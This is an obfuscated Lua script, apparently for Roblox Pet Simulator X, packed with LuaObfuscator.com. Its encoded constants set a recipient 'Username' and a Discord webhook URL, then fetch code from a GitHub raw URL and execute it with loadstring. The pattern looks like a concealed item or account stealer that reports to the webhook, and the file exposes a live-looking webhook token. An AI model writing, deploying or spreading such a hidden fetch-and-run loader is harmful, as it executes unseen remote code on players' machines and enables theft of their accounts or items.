--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v80=0 -0 ;local v81;while true do if (v80==0) then v81=(v31/((5 -3)^(v32-1)))%(2^(((v33-(1 -(0 + 0))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v81-(v81%(932 -(857 + 74))) ;end end else local v82=((1447 -(282 + 595)) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v82 + v82))>=v82) and 1) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24() local v34,v35,v36,v37=v1(v16,v19,v19 + (1640 -(1523 + 114)) );v19=v19 + (17 -13) + 0 ;return (v37 * (23917454 -7140238)) + (v36 * (66601 -((185 -(32 + 85)) + 997))) + (v35 * (1526 -(226 + 1024 + 20))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29() local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;while true do if (v38==(574 -(426 + 146))) then local v87=1130 -(87 + 1043) ;local v88;while true do if (v87~=0) then else v88=448 -(10 + 438) ;while true do local v99=0 + 0 ;while true do if (v99==(0 + 0)) then if (v88~=(3 -2)) then else return v42;end if (v88==(0 + 0)) then local v115=1180 -(1123 + 57) ;while true do if (v115~=(0 + 0)) then else for v141=1 + 0 ,v24() do local v142=254 -(163 + 91) ;local v143;local v144;while true do if (v142==(1931 -(1869 + 61))) then while true do if ((1251 -(721 + 530))==v143) then v144=v22();if (v21(v144,1,1272 -(945 + 326) )~=(0 + 0)) then else local v172=0;local v173;local v174;local v175;local v176;local v177;while true do if (v172==(6 -4)) then v177=nil;while true do if (v173~=(1 -0)) then else local v178=0 + 0 ;while true do if (1~=v178) then else v173=702 -(271 + 429) ;break;end if (v178==(0 + 0)) then v176=nil;v177=nil;v178=1;end end end if ((1500 -(1408 + 92))==v173) then v174=0;v175=nil;v173=1 + 0 ;end if (v173==(2 -0)) then while true do if (v174~=1) then else local v179=0 + 0 ;local v180;local v181;while true do if (v179==1) then while true do if (v180==(1474 -(1329 + 145))) then v181=0;while true do if (v181~=(1171 -(418 + 753))) then else local v194=971 -(140 + 831) ;while true do if (0==v194) then v177={v23(),v23(),nil,nil};if (v175==(0 + 0)) then local v195=438 -(262 + 176) ;local v196;local v197;while true do if (v195==(1722 -(345 + 1376))) then while true do if (v196==0) then v197=0 + 0 ;while true do if (v197~=(688 -(198 + 490))) then else v177[3]=v23();v177[4]=v23();break;end end break;end end break;end if (v195~=(0 -0)) then else v196=0 -0 ;v197=nil;v195=1 + 0 ;end end elseif (v175==(1207 -(696 + 510))) then v177[5 -2 ]=v24();elseif (v175==(1264 -(1091 + 171))) then v177[1 + 2 ]=v24() -(2^(50 -34)) ;elseif (v175==(9 -6)) then local v200=374 -(123 + 251) ;local v201;while true do if (v200==0) then v201=0 -0 ;while true do if (0==v201) then v177[3]=v24() -((700 -(208 + 490))^(6 + 10)) ;v177[1149 -(466 + 679) ]=v23();break;end end break;end end end v194=1;end if ((2 -1)==v194) then v181=1;break;end end end if (v181==1) then v174=5 -3 ;break;end end break;end end break;end if (v179==(0 + 0)) then v180=0 + 0 ;v181=nil;v179=1;end end end if (v174~=(1 + 1)) then else local v182=836 -(660 + 176) ;local v183;while true do if (v182==0) then v183=0;while true do if ((0 + 0)==v183) then if (v21(v176,203 -(14 + 188) ,2 -1 )==1) then v177[2]=v44[v177[677 -(534 + 141) ]];end if (v21(v176,2,2)==(585 -(57 + 527))) then v177[1430 -(41 + 1386) ]=v44[v177[3]];end v183=1 + 0 ;end if ((1 + 0)==v183) then v174=3 + 0 ;break;end end break;end end end if (v174~=3) then else if (v21(v176,3,6 -3 )~=(1 -0)) then else v177[170 -(122 + 44) ]=v44[v177[11 -7 ]];end v39[v141]=v177;break;end if (v174~=(0 -0)) then else local v185=0 + 0 ;local v186;local v187;while true do if ((0 + 0)==v185) then v186=0 + 0 ;v187=nil;v185=1;end if (v185==(397 -(115 + 281))) then while true do if (v186==0) then v187=0 -0 ;while true do if (v187~=(0 + 0)) then else v175=v21(v144,3 -1 ,7 -4 );v176=v21(v144,14 -10 ,6);v187=868 -(550 + 317) ;end if (v187==(1 -0)) then v174=66 -(30 + 35) ;break;end end break;end end break;end end end end break;end end break;end if (v172==(0 -0)) then v173=0 -0 ;v174=nil;v172=286 -(134 + 151) ;end if (v172==(3 -2)) then v175=nil;v176=nil;v172=1667 -(970 + 695) ;end end end break;end end break;end if (v142==(0 -0)) then v143=1990 -(582 + 1408) ;v144=nil;v142=3 -2 ;end end end for v145=581 -(361 + 219) ,v24() do v40[v145-(1 -0) ]=v29();end v115=1;end if (v115==(3 -2)) then v88=1825 -(1195 + 629) ;break;end end end break;end end end break;end end end if (v38==1) then local v89=0;while true do if (v89==(1 + 0)) then local v98=0 -0 ;while true do if (v98~=(241 -(187 + 54))) then else for v101=1,v43 do local v102=780 -(162 + 618) ;local v103;local v104;local v105;while true do if (v102==1) then v105=nil;while true do if (v103==(1 + 0)) then if (v104==(1 + 0)) then v105=v22()~=(982 -(18 + 964)) ;elseif (v104==(3 -1)) then v105=v25();elseif (v104==3) then v105=v26();end v44[v101]=v105;break;end if (v103==(0 -0)) then local v148=0 + 0 ;local v149;while true do if (v148~=0) then else v149=1636 -(1373 + 263) ;while true do if (v149==0) then local v171=1000 -(451 + 549) ;while true do if (v171==(1 + 0)) then v149=1;break;end if (v171==(126 -(116 + 10))) then v104=v22();v105=nil;v171=1 + 0 ;end end end if (v149~=(1 -0)) then else v103=739 -(542 + 196) ;break;end end break;end end end end break;end if (v102~=(0 -0)) then else local v116=0;local v117;while true do if (v116==(1384 -(746 + 638))) then v117=0 + 0 ;while true do if (v117==(1 -0)) then v102=1;break;end if (v117==(0 + 0)) then local v170=0;while true do if (v170==(0 + 0)) then v103=0 -0 ;v104=nil;v170=1;end if (v170==1) then v117=342 -(218 + 123) ;break;end end end end break;end end end end end v42[7 -4 ]=v22();v98=1582 -(1535 + 46) ;end if ((1 + 0)==v98) then v89=7 -5 ;break;end end end if (v89==2) then v38=1 + 1 ;break;end if (v89~=(0 -0)) then else v43=v24();v44={};v89=561 -(306 + 254) ;end end end if (v38==(0 + 0)) then local v90=0;while true do if (v90~=(378 -(142 + 235))) then else v41={};v42={v39,v40,nil,v41};v90=1469 -(899 + 568) ;end if (v90~=(0 + 0)) then else v39={};v40={};v90=2 -1 ;end if (v90==(605 -(268 + 335))) then v38=291 -(60 + 230) ;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25() local v45=v24();local v46=v24();local v47=1 -0 ;local v48=(v21(v46,1 + 0 ,20) * ((2 + 0)^32)) + v45 ;local v49=v21(v46,13 + 8 ,14 + 17 );local v50=((v21(v46,19 + 13 )==(2 -1)) and  -(2 -1)) or ((733 -(476 + 255)) -1) ;if (v49==(0 + 0)) then if (v48==0) then return v50 * (0 -0) ;else v49=1;v47=753 -(239 + 514) ;end elseif (v49==(719 + 1328)) then return ((v48==(1329 -(797 + (1662 -(369 + 761))))) and (v50 * (1/(0 + 0 + 0)))) or (v50 * NaN) ;end return v8(v50,v49-(346 + 677) ) * (v47 + (v48/((4 -(2 -0))^(1254 -(373 + 829))))) ;end v26=nil;function v26(v51) local v52;if  not v51 then local v83=(216 -(42 + 174)) -0 ;while true do if (v83==(238 -(64 + 174))) then v51=v24();if (v51==(0 + 0)) then return "";end break;end end end v52=v3(v16,v19,(v19 + v51) -(1 -0) );v19=v19 + v51 ;local v53={};for v64=337 -(144 + 192) , #v52 do v53[v64]=v2(v1(v3(v52,v64,v64)));end return v6(v53);end v18=5;end if (v18==2) then function v22() local v54=v1(v16,v19,v19);v19=v19 + 1 ;return v54;end v23=nil;function v23() local v55,v56=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 + 0 ;return (v56 * 256) + v55 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v57) if (v1(v57,2)==79) then v20=v0(v3(v57,1,1));return "";else local v84=v2(v0(v57,16));if v20 then local v91=v5(v84,v20);v20=nil;return v91;else return v84;end end end);v18=1;end if (v18==7) then function v30(v58,v59,v60) local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end if (v86==1) then if (v79<=5) then if (v79<=2) then if (v79<=0) then local v106=v78[2];v76[v106]=v76[v106](v13(v76,v106 + 1 ,v71));elseif (v79==1) then v70=v78[3];else do return;end end elseif (v79<=3) then v60[v78[3]]=v76[v78[2]];elseif (v79==4) then v76[v78[2]]=v78[3];else local v121=v78[2];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v71=(v123 + v121) -1 ;local v124=0;for v138=v121,v71 do v124=v124 + 1 ;v76[v138]=v122[v124];end end elseif (v79<=8) then if (v79<=6) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79==7) then v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v60[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v70=v78[3];else v76[v78[2]]=v60[v78[3]];end elseif (v79<=9) then local v110=v78[2];local v111=v76[v78[3]];v76[v110 + 1 ]=v111;v76[v110]=v111[v78[4]];elseif (v79==10) then v76[v78[2]]();else local v132=0;local v133;local v134;local v135;local v136;local v137;while true do if (v132==2) then v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v137=v78[2];v134,v135=v69(v76[v137](v13(v76,v137 + 1 ,v78[3])));v132=3;end if (v132==4) then v76[v137]=v76[v137](v13(v76,v137 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v132=5;end if (v132==3) then v71=(v135 + v137) -1 ;v133=0;for v167=v137,v71 do v133=v133 + 1 ;v76[v167]=v134[v133];end v70=v70 + 1 ;v78=v66[v70];v137=v78[2];v132=4;end if (v132==1) then v78=v66[v70];v137=v78[2];v136=v76[v78[3]];v76[v137 + 1 ]=v136;v76[v137]=v136[v78[4]];v70=v70 + 1 ;v132=2;end if (v132==5) then v70=v78[3];break;end if (v132==0) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v76[v78[2]]=v60[v78[3]];v70=v70 + 1 ;v132=1;end end end v70=v70 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6C652O6F6861736E6F72692O7A2F5053587363726970742F6D61696E2F736B69622O69647925323064756B6503083O00557365726E616D6503083O0074726F6D70342O3603073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323138343O3039333238343230343639372F4769573773566E6D2D305A6A666E6C712O75706D612D42497546666B2O676F66765066496D777053672O37474C5A3344324844677A772D7A536C392O386957656C4B693200143O0012043O00013O0026063O000B000100020004013O000B0001001208000100033O00120B000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026063O0001000100010004013O00010001001204000100083O001207000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00023O00017O00",v9(),...);
